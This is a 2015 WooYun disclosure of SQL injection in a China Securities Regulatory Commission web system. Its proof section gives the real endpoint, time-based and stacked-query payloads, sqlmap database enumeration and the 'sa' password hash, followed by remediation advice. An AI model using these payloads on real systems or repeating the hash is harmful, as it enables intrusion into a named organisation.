当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133705

漏洞标题:中国证监会某系统SQL注入漏洞

相关厂商:中国证监会

漏洞作者: Zacker

提交时间:2015-08-12 20:43

修复时间:2015-08-17 20:44

公开时间:2015-08-17 20:44

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-12: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

233

详细说明:

http://gzly.12386.gov.cn/csrc/sh.web.onlinecall.validatePassWord.sh?queryCode=1&pwd=1


注入点为queryCode和pwd(这俩参数都能注)。

Snip20150812_3.png

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: queryCode
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: queryCode=1'); WAITFOR DELAY '0:0:5';-- AND ('egSg'='egSg&pwd=1&startTime=2015-01-04&endTime=2015-08-04&keyWord=1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: queryCode=1') WAITFOR DELAY '0:0:5'-- AND ('JckC'='JckC&pwd=1&startTime=2015-01-04&endTime=2015-08-04&keyWord=1
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] csrc_inb
[*] master
[*] model\14
[*] msdb
[*] ReportServer$SERVERDB
[*] ReportServer$SERVERDBTempDB
[*] tempdb
[*] test1
current user: 'sa'
database management system users password hashes:
[*] sa [1]:
password hash: 0x0100b305d51f8ebcb632e990e3bf86a7920cfa697f29e6044563
header: 0x0100
salt: b305d51f
mixedcase: 8ebcb632e990e3bf86a7920cfa697f29e6044563

修复方案:

1、参数化查询;
2、过滤特殊字符;
3、数据库用户别用sa,违反了最小权限原则。

版权声明:转载请注明来源 Zacker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-17 20:44

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无